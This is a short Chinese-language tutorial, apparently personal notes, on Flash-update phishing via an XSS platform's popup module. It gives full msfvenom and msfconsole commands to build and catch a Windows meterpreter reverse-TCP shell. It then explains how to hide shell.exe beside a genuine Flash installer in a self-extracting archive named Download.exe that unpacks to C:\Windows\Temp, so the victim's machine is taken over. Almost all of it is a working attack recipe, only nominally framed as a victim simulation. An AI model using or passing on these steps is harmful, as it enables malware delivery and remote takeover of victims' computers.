首先来到xss平台 点击公共模块---flash弹窗钓⻥-查看
点击复制代码并且粘贴到1.js中并且修改为自己的IP
进入kali使用msf生成一个木马代码如下
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7(改成自己虚拟机IP) LPORT=4444 -f exe > shell.exe
开启监听
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.7
set lport 4444
run
生成shell.exe的文件将其放到你网站的根目录下
去真的flash官网下载安装包---flash官网下载地址:Flash Player官方下载中心-Flash中国官网
将两个⽂件⼀块压缩并更改⽂件名为"Download.exe"并且将压缩包命名为download.exe
标签卡点高级进入自解压选项将解压路径设置为--C:\Windows\Temp并且做如下设置
最后模拟受害者的流程 最终获取到受害者⽹站控制权